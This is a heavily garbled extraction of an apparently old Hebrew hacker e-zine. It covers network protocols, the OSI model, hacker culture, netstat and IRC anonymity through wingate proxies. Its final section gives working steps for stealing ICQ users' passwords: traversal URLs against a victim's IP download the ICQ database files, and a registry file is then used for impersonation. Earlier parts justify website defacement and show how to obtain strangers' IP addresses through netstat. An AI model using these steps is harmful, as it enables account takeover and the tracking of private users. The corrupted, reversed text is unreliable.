' כ שמשמ Redirector 3MB F 3erVer Message Bo'
( תומש לש טלפ(טלק-ל שמשמ ,P ) NetBios F 8orking under 3ession
ומכ NetBios ' ב #מות אל הזש קר
Routing Message
NetBM, F 8orking under #ransIort
-ל תומש םוגרתל תכרעמ ,P . 8ins ! 8indows ,nternet Na4ing 3erVice
+N3
.רתוי םיישומישהו רתוי םיצופנה םילוקוטורפל רובענ וישכע
. השוע אוה המ " לוקוטורפה םש
.הדוקנל הדוקנמ רשק
PPP F Point to Point Protocol
' ה ינפל תחא הלועפ השוע PPP 37,P F 3erial 7ine ,nternet Protocol
' ה --- -- -- PPP .הסוחד הרוצב קר ! &37,P F co4Iress 3erial 7ine ,nternet
Protocol
( .םיצבק תאלעהו םיצבק תדרוה #ransIort ) -#P F -ile #ransQer Protocol
.םיפוסמ ןיב הדובעל לוקוטורפ
#elnet F #er4inal Networking
.אצוי(סנכנ ראודל לוקוטורפ
3M#P F 3i4Ile Mail #ransQer Protocol
'וכו םירתא .טסקט-רפיה טנרטניאל לוקוטורפ
H##P F H)Ierte't #ransQer Protocol
.תשרה לש טושפ לוהינל לוקוטורפ
3NMP F 3i4Ile Network Manage4ent
Protocol
.עדימ לש תולודג תוליבח תרבעהל רזוע
M$P F Mser $atagra4 Protocol
.םינותנ. תלבק(תרבעהל שמשמ
#&P F #rans4ission &ontrol Protocol
.טנרטניאל תרושקתל שמשמ
,P F ,nternet Protocol
ידכ תשמשמ רשא הצופנ םילוקוטורפ תליבח
.טנרטניאה תשרל שולגל
#&P / ,P ! #rans4ission &ontrol
Protocol/,nternet Protocol
.םלועב רתויב %ופנה לוקוטורפב גאב הזל אורקל םא עדוי אל ינאש !הזכ קיעמ רבד ןימ ומכ ונשי
-ה #&P/,P עדימ חלוש התאש םעפ לכב !זא עדימ תחילשל לוקוטורפב שמתשמ התא רשאכ !
תרבעה בצק לע עיפשמ השקמ הז זא .#תעידי ילב !ןמז ותואב הליבח דירומ םג התא זא הליבחב
.9רחא ןעמנ לא #ממ םינותנה
( ןוגכ !,םירפסמ+ תורפס קר !תויתוא אורקל לגוסמ וניא לנה לוקוטורפה
9*3%9*+%*93%* תובותכ() ,P לוקוטורפ םג ונשי הז לוקוטורפב שמתשמש בשחמ לכב זא !)
$ארקנ אוה .םירפסמל תויתואה תרמה לע יארחאש
"RP F "ddress Resolution Protocol .
$הככ ליחתמ הרמהה #ילהת לכ
+% NetBios &ache, 9%8ins, 3%Broad&ast, :%74host Qile, =%Host Qile, J% $N3%
9 $אמגוד
• Bios&ache n [www%walla%co%il] F הרמהב ליחתמו תויתואה תא טלוק אוה
• 8ins F תויתואה חונעפב ליחתמ אוה !םירפסמל תויתואה תא ריממה ןונגנמה%
• Broad&ast F תוא לש רודיש%
• 74host -ile F םירפסמל תויתואמ ונלש הרקמב .#פיהלו םירפסמל תויתוא ריממ%
• Host -ile F לעמ %בוק ה לש םינותנה יפע חראמ %בוק%
• $N3 n [+;9%++.%N*%9] F הרמהה לש טלפה
%ופנהו עודיה לוקוטורפה דבוע הככ #&P/,P .
-----------------------------------------------------------------------------------------------
.תשרב הדובעב תומדקתמ רתוי תצק םהש תורדגה ינשל רובענ
6$, F 6Ien $atalink ,nterQace & 6Ien $eVice ,nterconnect%
N$,3 F Net8ork $riVer/$eVice ,nter-ace 3IeciQication%
6$, F םיחותפ םינותנ תרבעה לש הגצה תרוצ%
N$,3 F תונולח תביבסב תשר ילהנמל קשממ%
By Pirsing
+N:
תבכשל אובמ OSI
-ה 63, ב רואל אצוה +;N. -ה יע ,36 )ימואלניבה םינקתה ןוגרא (
-ה 63, .תובכש עבש לש םיחנומב םיבשחמ ןיב תרושקתה תויצקנופ תא רידגמ
לש ןויערה 63, יתשש םיקשממו םילוקוטורפ תרזעב ןהיניב רשקתל ולכוי תונוש תוכרעמש אוה
.תוניבמ תוכרעמה
-ה תא רצי ימואלניבה םינקתה ןוגראשכ 63, תובכש העבשל תותשרה תויצקנופ תא קליח אוה
$ןהו

00000000000000
1 Application 1
1000000000000001
1 Presentation 1
1000000000000001
1 Session 1
1000000000000001
1 Transport 1
1000000000000001
1 Network 1
1000000000000001
1 Data Link 1
1000000000000001
1 Physical 1
1000000000000001
.הבכש לכ לע ריבסא ינא וישכע
תבכש 0 Ph)sical
לכ הרידגמ םג איה םילבכ ןוגכ םהב תעגל רשפאש !םייזיפה םירבדה םצעב איה תאזה הבכשה
םירבד ינימ
.םילבכב םיניפ ומכ
תבכש 0 $ata 7ink
תרבעהב תויעבב לופיט תקפסמ םג הבכשה הדוקנל הדוקנמ םינותנ תרבעה תקפסמ וז הבכש
.םינותנה
תבכש 0 Network
טולשלו טוונל הלוכי תאזה הבכשה !תובכשה ןיב םינותנ תרבעה תרשפאמ תאזה הבכשה
.תוליבחב
הבכשה יע ורצונש תוליבחל תבותכ תתל אוהש הבכשל דיקפת דוע שי #ransIort הילע ריבסנש
םתא ףכית
.תבותכ םהל תנתונ איה המל וניבת רבכ
תבכש 0 #ransIort
ינשב ותוא חלוש התא זא םיפד ינש אוה לבא םייוסמ תרשל בתכמ חולשל הצור התאש דיגנ
!תוליבח
החילשה רדס יפל תורדוסמ םהש קדוב אוהו חלושה דצמ תוליבחה תא תרפסממ תאזה הבכשה
ביכרמ אוהש ינפל
.דחא רבדל לכה
תבכש 0 3ession
+N=
הזיאו רבדמ םושיי הזיא עובקל אוה הבכשה דיקפת הז םע הז םירשקתמ תשרב םימושיי ינששכ
!בישי
זא קתנתה טנרטניאל רוביחה םואתפש לשמל םירחא םירבד ינימ לכ לע תחקפמ םג הבכשה
איה תאזה הבכשה
.קתנתה טנרטניאל רוביחהש #תוא העירתמש יתאז
תבכש 0 Presentation
םינותנ תסיחדל םגו הנפצהל םג תשמשמ איה !רודישל תועדוהה תא הניכמ םצעב וזה הבכשה
הרבעהש ידכ
.רתוי הריהמ היהת
תבכש 0 "IIlication
םינותנ דירוהל ומכ !הז תא השוע הלעפהה תכרעמו תושעל המ שקבמ התא הבש הבכשה יהוז
רחא בשחממ
תבכשל השקבה תא תחלוש הבכשה !רחא רבד לכ וא #ransIort .#ישממ הז םשמו
$םיקלח השולש דועל תוקלוחמ תובכשה תעבש לכ
-ה תובכש Ph)sical, $ata 7ink, Network תוארקנ &o44unication 3ubnet
-ה תובכשה 3ession, Presentation, "IIlication תוארקנ Host Process
תיעצמאה הבכשהה #ransIort .םירחאה םיקלחה ינש ןיב %צוחכ תשמשמ
63, 4odel and internet
"IIlication , Presentation , 3ession
44
44
N-3, K$R, RP& !
#7N#, -#P !
3M#P, R,P .

#ransIort
44
44
#&P, M$P
Network , $ata 7ink , Ph)sical
44
44
,P, ,&MP
.*9%9
.*9%3 &3M"/&$
.*9%: #oken Bus
.*9%= #oken Ring
63, 4odel and NoVell Net8are

+NJ
"IIlication , Presentation , 3ession
44
44
N&P, N#B,63
4ulation !
N#K, BtrieVe !
Net8are, RP& !
3#R"M3, #7, !
3"P
#ransIort
44
44
3PK, ,PK
Network , $ata 7ink , Ph)sical
44
44
.*9%9
.*9%3 &3M"/&$
.*9%: #oken Bus
.*9%= #oken Ring
By ¡Twix &
+NN
םירקאהה תוברת
המדקה
דחאו דחא לכ ןייפאנו םגוס תא רידגנ !ונימי לש םירקאהה לש תוברתה לע תצק רפסנ הז טסקטב
.םהמ
תאו םירחוב םהש תרשל וא רתאל הצירפב םירקאהה לש םתדמע תא ריהבהל רומא טסקטה
.תוביסה
ןוברחה תא איצומ ללכב ינא המלו םכמ הצור ינא לזאזעל המ !םכמצע תא םילאוש חטב םתא
.רואל הזה
ירותפכ תא ששמלמ %וח םייחב תושעל המ יל ןיאו םמעושמ ליפודפ ינא יכ...הטושפ הביסה
.בשחמה
"ליחתנ !תוניצרב וישכעו
וא תחא הטישב םיצרופ םה המל םיעדוי אל !םהמ םיבר לש םתעידי ילב וליפא !םירקאהה בור
.םמוקמב םתוא רידגהל הסננ ונחנא לבא...ירעזמ קזנ וא #יפה יתלב קזנ םישוע םה המלו !תרחא
רבחתהל םיסנמ םתאש קניל לכש םיאורו !%רפנש רתאב םתשגפנ םיימעפ אלו םעפ אלש חוטב ינא
.תמ !תרשה #רד וילא
+ וירחא תובקועש תומושרה לש תוביקעה לכ תא קר אל קחמ !ונלש רקאהה !הטושפ הזל הביסה
76G3 .תרשה)רתאה ןכות לכ תא םג אלא ,
ללכ #רדב האב הז גוסמ הצירפ !הדיחא ללכ #רדב הביסה ןאכ םג- .הז תא השע אוה המלו
טילחמ םדאנבה זא...יידמל הברה וב םילקתנ ונחנא הנורחאה הפוקתבש המ !תוינעזג תוביסמ
...הפ יוצר אל אוהש רסמה תא טולקיישו תומל בייח הזה תרשה ןסכאמש
דחא ףאשו ,לילא ןימ+ ורוג אוהש %יוושהל הצור םדאנבהש ללגב האב !הז גוסמ הצירפל הביס דוע
הממ אלימב ןיא ולש להנמלש !ןכסמ יברע תרש הזיא םוקייהמ קחמ אוהש ללגב !וילע לגוסמ אל
אוה זא- .בהלתהל ול שי רבכ הממ זא...#ירצש ומכ ותוא חטבאמ אל וליפא אוה זא !סנרפתהל
.הא רבג שיגרמ..תרשה לע טלתשה אוה זא..גאב %ירה
אצויכו םיימואל םיפחד ללגב םתס םילעופ אל םהו !הלאכ אל םה םירקאהה בורש !ועדתש זא
.םהב
.הצירפב ונלש םחולה רקאה-ה לש הרטמה םצעב המ זא
.,עקרב לארשי לגד הזיא םיעקות ללכ #רדב+ !המקנ וא רסמ ריבעהל איה הרטמה
רזח קר םדאנבהש ללגב וא...#כל רבעמ רבד םוש אלו ביריה תא סורהל הרטמב האב הצירפה
חוכ ןיאו תושעל המ ןיא זא !בהאמה םע הטימב רבכ אמאו ישיש םויב קטוקסיד הזיאמ
.,תקדצומ תאזה הביסהו+...ןושיל
$יבויחה רקאה-ה לש דצה תא הלגנ וישכע
תא ריהזהל ללכ #רדב איה הצירפב ולש הרטמהש !חטבאמ)רקאה םצעב אוה !יבויחה רקאהה
.ולש תרשה לע םינקתומש םיתרש)תונכותה תחאב גאב הזיאמ םיתרשה להנמ
לבקיי %רופה םימעפל וליפאו םיטוסבמ ויהי םידדצה ינשו גאבה תא ןקתיי תרשה להנמ #כ
"השעמל הרומת יהשוזיא
ףדה תאו !ומש תא הנשיי קר אלא !רוקמה ףד תא קחמיי אל !ונלש םכחה %רופהש !אוה יאנתה -
$אמגודל סקדניאה ףד לש םשל הנשיי אוה !םוקמב תולעל הצור אוה ותוא httIh//www%tuVia!
the!kli%co4/inde'%ht4l
%רופה לבא...ול אבש המ בותכל לוכי אוה םש !%רופה םש ותואש %בוקה תחת הלעיי רתאהו
םש תאו !ולש ינורטקלאה ראודה תבית תא ןייציו !תרשה להנמל הרהזא קר םישי !תברותמה
.הניש אוה ותוא %בוקה
הז...בוט ונ- .ותוא ףורשל המל !דמחנ ןושוכ אוה וקישומ לבא$םכמצע תא םילאוש חטב םתא
.הזמ םלעתנ לבא !ימצע תא לאוש יתייה ינאש המ
".".ללכב הזמ יל אציי המ !איה שארב %וצתש הלאשה
קחומ אוה זא !םייח ול ןיאש דחא םתס אלו !דובכ םע רקאה רותב בשחית התא $הטושפ הבושתה
הברהל וכזת וליפא ילוא הככו !םירחאל םכילע %ילמיי םג תרשה להנמ !םימעפ הברהו...םירתא
"הדובע וליפא ילואו םירפו'צ
+N.
וכישמי םה םאש םיניבמ םירקאהה בור יכ !תשרב הצואת ספות יבויחה רקאהה !ןורחאה ןמזב
ליבשב זא...םיילילפ םיקיתל וליפא ילואו !םהלש בשחמה סוניקל םתוא ליבוי הז...תילילשה #רדב
.ןגאלבה לכ המ
$רוכזל בושח
לע לכתסהל לוכי אוה עגר לכבו !יבויח והשמכ םכלש הצירפה תא בישחי תרשה להנמ דימת אל
קפסל וא הרטשמל םכילע חוודל טושפו !םתוא םתקחמ אל םא אלא ,תומושר+ ונלש םיגולה
אוה םא וליפא םכלש טנרטניאה ןובשח תא םכממ תחקל הצריי החמשבש- םכלש טנרטניאה
...הזמ חיוורמ
$הנקסמ
םיצור םתא םינצרפ לש גוס הזיא בוט בוט ובשחת !גניקאה לע תכלל םירחוב םתא םא
תא רתוי בוט ועדתש זא !ןכ םאו !#לכולמה קסעל סנכיהל םכל יאדכ ללכב םא ובשחת...תויהל
...םכינפלש םירבדה
By CnTaX
+N;
לע עדימ IP (םיצורעו Ports תדוקפ יידי'לע ) netstat
$םיניינע ןכות
אובמ
-ב שומיש .א N#3#"#
םיחותפ םיצורע חונעפ .ב
-ב שומיש .ג N#3#"# ירפסמ יוליגל ,P תנכות ישמתשמ לש ,&g
םיפסונ םישומיש .ד
םירזעו םילכ .ה
םיישומיש םיפיט .ו
םוכיס .ז
אובמ
.ביתכ תואיגשמ ומלעתה אנא !ילארשיה םירקאהה ןוגרא לש #ירדמ םיארוק םתא
"םכתאירקמ ונהתש אוה רקיעהו !הז טסקט תאירקמ רתוי קימעמ עדיי ושכרתש הווקמ ינא
.ותוא אורקל רתוי חונ םכל היהיש יידכב טסקטה תא וסיפדתש עיצמ ינא
!הנהמ האירק &N#"K .
-ב שומיש .א N#3#"#
$הנכותה תלעפה-
+ לע וצחל 3#"R# + )תירבעה אסריגב לחתה(, PR6GR"M3 + )םירזע וא תונכות(, M3!$63
PR6MP# .,
N#3#"# הנכותב שמתשמ תישיא ינא .תומישמ הברהל המיאתמש תישומיש דואמ הנכות איה
ירפסמ גישהל יידכב ,P -ב םתיא רבדמ ינאש םישנא לש ,&g -ב שמתשהל רשפא ןכ ומכ .
N#3#"# (םינאיורט םיסוס לש תוצירפ רתאל תנמ לע #R6f"N3 יידכב םתס וא םכבשחמב )
.םיצורעה תעונת תא תוארל
$תשקה תעב הנכותה תנתונש טלפה לש םכינפלש אמגודה לע ולכתסה N#3#"# $הרושב
ch<windows ןולחב M3!$63 PR6MP# .
&h<8,N$683jnetstat
Active Connections
Proto Local Address Foreign Address State
TCP pavilion:!"# $A%L&C':()*! +STA,LIS-+D
TCP pavilion:!"# s./as/)0/((1free1net1a2:30! +STA,LIS-+D
TCP pavilion:3(!") $A%L&C':()*4 +STA,LIS-+D
TCP pavilion:0") )!1(""110:!(0) +STA,LIS-+D
TCP pavilion:3)30 *1441()1()(1on15ave16o7e1co7:()3( +STA,LIS-+D
+ םיאור םתא .אמגודה לע לכתסנ ואוב וישכע PR6#6 .#סמה לש ילאמשה ודצב ,
+ וארת וירחא -oreign "ddress -ה רפסמ תא ונל ןתת וז הרוש , ,P שמתשמה לש תרשה םש ו(וא
(%ורעה תאו P6R# $האבה הרוצב אצמנ אוה וילע ) ,PhPort -ה רפסמ ןיב $ םע ,P .%ורעל
+ הלימה תא ואצמת ףוסבו 3#"# (%ורעה בצמ תא הארמ טושפש המ )בצמ(, P6R# .)
-בצמב תויהל לוכי הז קלח 3#"B7,3H$ -וא רבוחמ בצמב 8",#,NG &6NN&# םא םא
.)עדימל(הנזאה בצמב אוה
חנעפל יידכב הנכותב שמתשהל #יא לע רתוי םדקתמ בלשל םירבוע ונחנא הז עדיי םע וישכע
.םיחותפ םיצורע
םיחותפ םיצורע חונעפ .ב
+.*
ילב הבכנ #סמה .ומצעב חתפנ םור-יד.יסה .םכלש בשחמל הרוק רזומ והשמש םכל הרק
%רופ והשימש םיניבמ עתפלו....הפ הרוק לזאזעל המ םכמצע תא םילאוש םתאו .ותוא םתיביכש
(ןאיורט תרזעב בשחמל םכל #R6f"N .)
םתא ןכבו .ןוכנ ותוא דימשהלו םכל וחלש ןאיורט הזיא קודבל איה םכלש המישמה וישכע זא
.םיקדוצ
-ל בוש וכל זא M3!$63 PR6MP# #רד םהב שמתשהל רשפאש תויורשפא הברה ונל שי וישכע .
N#3#"# לש הרזעה טירפת תא לבקל תנמ לע #כ בותכל םילוכי םתא זא N#3#"# $
ch<windowsjnetstat helI
)םגרותמ בצמב טירפתה וב עיפויש ףסות בותכא ינא ילוא(
...ןאכל ורזחתו טירפתב ונייעת
...#ישמנ ואוב זא....םתארק
( הדוקפה תא בהוא תישיא ינא ch<windows<netstat !an (םיצורעה לכ תא הארמש ) P6R#3 )
-ה תבותכ ףוריצב םירוביחה לכ תאו םיחותפה ,P (תרשה םש םוקמב H63#N"M .)
ומכ םינאיורט לש םיצורע שפחל םילוכי םתא !םירוביחה תא קודבל םיעדוי םתאשכ וישכע
+93:= ( N#BM3 ומכ )ןשיה +9:3 ( 3MB 30N .'וכו )
ושעת וכל םדוק לבא !ולגת דיימש םכלש םיכרצה לכל ישומיש דואמ היהי םתדמלש המ לכ וישכע
הפל ורזחתו חומל בוט בוט םכל גפסיי וישכע דע םתלביקש עדימה לכש יידכ הנטק הקספה
"דוע דומלל םינכומ
-ב שומיש .ג N#3#"# ירפסמ יוליגל ,P תנכות ישמתשמ לש ,&g
-ה תא גישהל םתיצר םעפ-יא םאה ,P -ב םכתוא ןבציעש והשימ לש ,&g וא רתסומ היה אוה לבא
אוצמל ונל רוזעתש הטיש דמלנ ואוב זא...ןכש ימצעל ראתמ ינא .עיפוה אל טושפש ,P םישנא לש
-ל םירבוחמש ,&g .ונלש
רפסמ יוליג ,P שמתשמ לש ,&g #רד N#3#"# -
רפסמ גישהל יידכב ,P -ה תא חותפל םכילע !שמתשמה לש M3!$63 PR6MP# תושעלו
netstat !n -ב ותיא רבדל םתלחתהש ינפל )םיחותפה םיטרופה תמישר לכ תא תוארל יידכב( ,&g !
.#מסמ וא ףד לע םירפסמה תא ומשר
-ה רפסמ תא תולגל ןמזה עיגה וישכע ,P תוריהמב ושע וישכע העדוה שמתשמל וחלש .ולש netstat
!n
רפסמ לש השדח הרוש םכל ףסוותתו ,P !שדחה רפסמה תא םתישעש המישרה תרזעב ולג וישכע !
דימת אלש(םי'צאפו תוצירפ ינימ לכב שמתשהל ילב שתשמה לש רפסמה תא םכל שי וישכע
.אל ףיכ "םכל אבש המ ותיא תושעל םילוכי םתא ולש רפסמה תא םתדכל ירחא וישכע )םידבוע
םיפסונ םישומיש .ד
-ב N#3#"# תגשהל שמתשהל רשפא ,P ינש ןיב רישי רוביח שי דוע לכ !דחא לכו רבד לכ לש
!תורישי תועדוה !םיצבק תרבעה$אמגודל )ינשה שמתשמה ןיב וא הנכותה ןיבל #ניב(םינוויכה
לש טא'צ ,&g (קרימב ! M,R& ...דועו )
םירזעו םילכ .ד
(םיצורע קודבל יידכב $םיצורע תקירס P6R#3 ))$ םכלש אל(בשחמב םיחותפ )
+ seVenth sIhere Iort scanner לפנ םירתאה דחאש הרקמל םירתא ינש - ,
httIh//4e4bers%'oo4%co4/&r)Itog/NsIereIortscan%e'e
httIh//4e4bers%'oo4%co4/gohanP3/NsIereIortscan%e'e
+ 7ockdown 9*** ישיאה בשחמל תוצירפ תעינמל הנכות - ,
httIh//www%lockdown%co4
+ ,&g )..הזכ והשימ שיש יל הארנ אלש תורמל(ול ןיא ןיידעש ימל - ,
httIh//web%icO%co4
+.+
םיישומיש םיפיט .ה
םימעפל .א N#3#"# .ליחתמ שמתשמ לבלבלו תושקהל לולעש המ דואמ תוכורא תומישר טלופ
תא וצירת טושפ !םישקתמ םתא םא N#3#"# שמתשמה םע רשק ורציתו תודוקפ םוש אלל
תא וצירת זאו )ינשה שמתשמהמ העדוה תלבק(תחילש יידי לע(ינשה N#3#"# הכירצ .תינש
"םישפחמ םתאש המ הז - השדח הרוש עיפוהל
...האבה אסריגב אובי .ב
םוכיסל .ו
רתוי תויעוצקמ םיכרדב תוסנתהל וליחתת וישכעמשו עדיי םכל קינעה #ירדמהש הווקמ דואמ ינא
.וז ומכ
וייהתש דע !#רדה לכ #רואל םכתא וולייו #שמהב ועיגי םיכירדמ דואמ הברה דועש חיטבמ ינא
םלועב ןכדעתהל יידכב ונלש רתאל וסנכת רוציקב זא )$ יתמזגה ילוא...בוט "םינטק םינייטשנייא
"ןותחתה םלועה לכו םירקאהה
By Tricker
י$ע םגרות CnTax
+.9
'ב תוימינונא irc
-ב ימינונא תויהל #יא תוטיש המכ םכל הארי ינא הז #ירדמב םלוכל םולש irc #ירדמה תא יתבתכ
ןוויכמ הזה
ליחתנ הללאי זא וניבתו וארקת זא ילש יפ יאה תא ריתסהל #יא יתוא םילאוש ןמזה לכש
- הטיש + $
הככ #לוה הזו יפ ייאה תרתסהל הזב םיכמותש םיתרשל תורשפא הנשי קרימב
' 4ode )ournick s' )םישרגה ילב( '(
תרשל רמוא הז irc #ילע השוע והשימ םא יפ ייאה תא ריתסהל הזב #מות אוה םא whois
-הטיש 9 #רד wingate הלקה #רדה
$ל תכלל הז תאזה הטישב תושעל #ירצ התאש המ לכ
Qile !!j oItion !!j Qirewall
תורשפאה תא ןמסלו
M3 36&/3 Qirewall
תרש סינכהלו wingete טרופב +*.*
-הטיש 3 #רד wingate השקה #רדה
בצמב תא רשאכ אבה הדוקפה תא סנכת oQQline
serVer wingate!iIh[Iort 93] ie /serVer '''%'''%'''X,P "ddressY 93 (
ל רבוחמ התא וישכע wingate
אבה הרושה תא סינכת הצור התאש קרימ תרשל רבחתהל וישכע
Ouote irc%serVer%co4 JJJN (
תואבה תורושה תא סינכת גניפ לבקתש ינפל רהמ עצבל #רטצת אבה דעצה תא
Ouote user god bikkel snikkel urnick (
Ouote nick urnick (
לימ ייא יל וחלש תושקב וא תובוגת םכל שי םא
elidor.Jkhot4ail%co%il
By VB-Man
+.3
ויק.יס.יאל הצירפ
ילב(םהלש רפסמה לע שבלתהל 2 םירחא םישמתשמ לש תואמסיס גישהל לע רבסה %בוק
.)אמסיסה
.)השק הזש בשחש ימל( לק שממ הזו הז תא תושעל #יא תעדל וצר םישנא הברה
.תונעטב ואובת לא םכל דבוע אל םע זא !דבוע דימת אל הז - הנטק הנטק היעב שי לבא
$םיאבה םירבדה תא םיעדוי םתאש ואדוות - םדוק
אסריג תא דירוה אוהש 2 ;; .הנקתהה רחאל אל םש ויקיסיאהש תורדגהב עגנ אל אוהו
.רעטצמ זא ויקיסיאה תא יתבתכ ינא אל !תושעל המ ןיא לבא קיעמ תצק הזש עדוי ינא
.בשחמב םהלצא הרוק המ םיעדוי םתאש םישנא וא םירמייל לע דובעל בוט הז
.ותמסיס תא תולגל םיצור םתאש שמתשמה לש יפיא 2
.ותמסיס תא תולגל םיצור םתאש שמתשמה לש ויק יס יאה רפסמ 2
+ םיאבה םיצבקה תא ודירוה .
httIh//+93%+93%+93%+93/%ht4l/%%%%%%/db/M,N%id'
httIh//+93%+93%+93%+93/%ht4l/%%%%%%/db/M,N%dat
httIh//+93%+93%+93%+93/%ht4l/%%%%%%/db/M,N4sg%dat
httIh//+93%+93%+93%+93/%ht4l/%%%%%%/db/M,N4sg%id'
httIh//+93%+93%+93%+93/%ht4l/%%%%%%/db/M,Nhis%id'
httIh//+93%+93%+93%+93/%ht4l/%%%%%%/db/M,Nhis%dat
- ה תא0 +93%+93%+93%+93 - הםוקמבו ןברוקה לש יפיאה רפסמב ופילחה M,N רפסמה תא ומיש
.ולש
לש ויקויסיאה לש היקיתה לש השיגל תורושה םה(הנומש אל !הרושה עצמאב תודוקנ שש שי00
.)ןברוקה
.ול םיקוקז םימעפה לכגב אל רשא רחא טליופסקאב שמתשהל שי ןאכ
9 $םשל תואבה תורושה תא וקיתעהו שדח טסקט %בוק וחתפ.
הלימה תא ףילחהל $ רוכזל 000 H"&/$M,N .םכלש ןברוקה לש רפסמל
8 -'+9:C;%%+<T:;S+%\Soft5are\=ira>ilis\IC?\&5ners\-AC'+D;I<8"<a7e"@"-acAed ;I< "
8 -'+9:C;%%+<T:;S+%\Soft5are\=ira>ilis\IC?\&5ners\-AC'+D;I<\Prefs B
" %ando7 Cro2ps Dersion"@d5ord:)))))))a"&nline Color"@d5ord:))ff))))
" ;nlisted Color"@d5ord:))")))))"&ffline Color"@d5ord:))))))ff
" A2t6oriEe Color"@d5ord:))*)))")"<otif. Color"@d5ord:))")))")
" LastStat2s Color"@d5ord:))))")))
" Defa2lt File Dir"@"C:\\Progra7 Files\\IC?\\%eceived Files""S=TP Address ""@"
" D<D =essage"@"Please do not dist2r> 7e no51 Dist2r> 7e later1""&2t =essage ""@"
" ,2s. =essage"@";ser is occ2pied1 &nl. 2rgent 7essages 5ill >e delivered "1
" C6at =essage"@"I 5o2ld liAe to c6at a>o2t an.t6ing""A5a. Pre<27"@d5ord:))))))))
" &2t Pre<27"@d5ord:))))))))",2s. Pre<27"@d5ord:))))))))
" D<D Pre<27"@d5ord:))))))))"C6at Pre<27"@d5ord:))))))))
" File &ptions"@d5ord:)))))))*";%L &ptions"@d5ord:)))))))*
" C6at &ptions"@d5ord:)))))))*"All &ptions"@d5ord:)))))))e
" +FT &ptions"@d5ord:)))))))*"Start2p"@"<o""A2to A5a."@"<o "
" A2to -ide Ti7e"@d5ord:))))))(e"A2to -ide"@"<o""=ove Server Top"@"<o "
" ,linA In Tra."@"<o""Sort Lists"@"9es""S6o5 &nline List"@"<o "
" %e7ove AddFriend"@"9es""Splas6 &pen"@"9es""-istor. Last First"@"9es "
" FloatTop"@"9es""T6r2 Server"@"<o""Goin C6at"@"<o""&pen ;%L ,ro5ser"@"<o "
" %ef2se File <otInList"@"<o""&ver5rite +HistFile"@"<o "
" Disa>le &nline Alert"@"9es""Accept ;rgent In ,2s."@"<o "
" ,linA Tra. In A5a.,2s."@"9es"";se Contact List Color"@"<o "
" Contact List Color"@d5ord:))c">00d"Save ;ser File"@"9es""A2to ;pdate"@"9es "
" Searc6 $iEard"@"<o""Defa2lt =ailer"@"9es""Pop Pla. So2nd"@"9es "
" Pop A2to La2nc6"@"<o""Pop C6ecA"@"<o""Pop Ti7e"@d5ord:)))))))a
" C6ecA -eaders"@"9es""=oveTo&2tDela."@d5ord:))))))(*"=oveTo&2t"@"<o "
" =oveToA5a.Dela."@d5ord:)))))))a"=oveToA5a."@"<o""A2to Sleep =ode"@"<o "
" Log -istor. +vents"@"9es""Connection T.pe"@"Per7anent""Fire5all"@"9es "
" ;seCivenIP"@"<o""SocAs"@"<o""SocAsPort"@d5ord:)))))*3"
" SocAsServer"@"+nter .o2r socAs server "
" ProH.SocAs*-ost"@"+nter .o2r proH. server""ProH.SocAs*Port"@d5ord:)))))*3"
" ;seProH.SocAs*"@"<o""CiveStats"@"<o""SocAsDersion"@d5ord:)))))))*
" SocAsA2t6entication"@d5ord:))))))))"Fire5allTi7eo2t"@d5ord:))))))(e
" ;seFire5allTi7eo2t"@"<o"";seFire5all%angePorts"@"9es "
" Fire5allFro7Port"@d5ord:))))!0d""Fire5allToPort"@d5ord:))))#(*"
" &ld SocAets"@"<o"";serT.pe"@d5ord:))))))))"=ail %eceipients ";"@"
+.:
" %ando7 Availa>le"@"<o""%ando7Cro2p<a7e"@d5ord:)))))))(
" %ando7 <a7e"@"IJdKL 444 MB""Allo5 Sec2re Clients &nl."@"9es "
" P6oneApproval"@"9es""P6oneToneTi7e"@d5ord:))))))3
" P6onePa2seTi7e"@d5ord:)))))(f*"P6one,reaATi7e"@d5ord:))))))"
" P6oneSettings"@d5ord:)))))))("P6onePa2seC6ar"@"N""P6oneLocalP " "@"
" P6oneLongP"@" ""P6oneInterP"@" ""C6at %oo7<a7e"@"Prod2ct S2pport O S2ggestion "
" A2to Goin C6at %oo7"@"9es""<ovice Co2nter"@d5ord:)))))))a
" =en2 Co2nter"@d5ord:))))))(3"Servers Dersion"@d5ord:)))))))(
" +Hternals Dersion"@d5ord:))))))(0
" Stats"@6eH:4)NffNeaN!N!cN34N))N))N))N))N))N))N))N))N))N))N))N))N))N))N))N)) \N
))N))N))N))N))N))N))N))N))N))N))N))N))N))N))N))N))N))N))N))N))N))N))N))N)) \N
))N))N))N))N))N))N))N))N))N))N))N))N))N))N))N))N))N))N))N))N))N))N))N))N)) \N
))N))N))N))N))N))N))N))N))N))N))N))N))N))N))N))N))N))N))N))N))N))N))N))N)) \N
))N))N))N))N))N))N))N))N))N))N))N))N))N))N))N))N))N))N))N))N))N))N))N))N)) \N
))N))N))N))N))N))N))N))N))N))N))N))N))N))N))N))N))N))N))N))N))N))N))N))N)) \N
))N))N))N))N))N))N))N))N))N))N))N))N))N))N))N))N))N))N))N))N))N))N))N))N)) \N
))N))N))N))N))N))N))N))N))N))N))N))N))N))N))N))N))N))N))N))N))N))N))N))N)) \N
))N))N))N))N))N))N))N))N))N))N))N))N))N))N))N))N))N))N))N))N)) " <ovice"@"<o "
" Dropped ;sers"@6eH:)(N))N))N))N*3NcaN3!N))Ne4N)N(fN))
" State Flags"@d5ord:))))))))"Server =sg Dersion"@d5ord:)))))))>
" Server =sg S6o5n"@d5ord:)))))))("Server =sg Co2nt"@d5ord:)))))))0
" Left,2tton $arning"@"<o""=en2 Left ClicA"@"<o""Tip Start2p"@"<o "
" Tip Position"@d5ord:))))))))"=ore+vents $arning"@"<o""Invisi>le $arning"@"<o "
" Send Later $arning &ff"@"<o"",2s. $arning"@"<o""A5a. $arning"@"<o "
" D<D $arning"@"<o""FT $arning"@"<o""+Ht $arning"@"<o""&2t $arning"@"<o "
" C6at $arning"@"<o "
" A5a. =essage"@";ser is c2rrentl. a5a.\r\n9o2 can leave 6i7O6er a 7essage "
" %ando7 Co77ent"@"9o2 5onPt >e 62rt >. t6ings .o2 donPt care1\r\n\r\n(cQ CalvinPs La>sN (003/(00"1
<o %ig6ts %eserved1\r\nItPs not a secret1 ItPs not a 7agic1 ItPs not a 7.t6 "1
8 -'+9:C;%%+<T:;S+%\Soft5are\=ira>ilis\IC?\&5ners\9&;%;I<\Prefs\Presets B
" &2t=sg Presets )"@"IP7 o2tPa 6ere1 See .o2 to7orro5 "R
" D<D=sg Presets )"@"Please do not dist2r> 7e no51 Dist2r> 7e later "1
" A5a. Presets=sg )"@"A5a.""&2t Presets=sg )"@"&2t for t6e da. "
